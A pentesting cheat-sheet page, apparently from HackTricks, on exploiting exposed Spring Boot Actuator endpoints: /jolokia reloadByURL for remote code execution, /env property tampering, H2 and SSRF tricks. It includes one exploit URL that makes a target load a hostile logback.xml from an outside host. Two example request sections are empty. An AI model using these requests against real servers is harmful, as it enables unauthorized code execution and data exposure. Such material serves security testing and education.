Spring Actuators
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Spring Boot Actuators register endpoints such as /health
, /trace
, /beans
, /env
, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only /health
and /info
are non-sensitive by default, but developers often disable this security.
Certain Actuator endpoints can expose sensitive data or allow harmful actions:
/dump
, /trace
, /logfile
, /shutdown
, /mappings
, /env
, /actuator/env
, /restart
, and /heapdump
.
In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x, they are under the /actuator/
base path.
Remote Code Execution via '/jolokia':
The /jolokia
actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans.
The reloadByURL
action can be exploited to reload logging configurations from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML configurations.
Example exploit URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
Config Modification via '/env':
If Spring Cloud Libraries are present, the /env
endpoint allows modification of environmental properties.
Properties can be manipulated to exploit vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.
Example exploit POST request:
Other Useful Settings:
Properties like spring.datasource.tomcat.validationQuery
, spring.datasource.tomcat.url
, and spring.datasource.tomcat.max-active
can be manipulated for various exploits, such as SQL injection or altering database connection strings.
A comprehensive list of default actuators can be found here.
The /env
endpoint in Spring Boot 2.x uses JSON format for property modification, but the general concept remains the same.
Env + H2 RCE:
Details on exploiting the combination of /env
endpoint and H2 database can be found here.
SSRF on Spring Boot Through Incorrect Pathname Interpretation:
The Spring framework's handling of matrix parameters (;
) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
Example exploit request:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)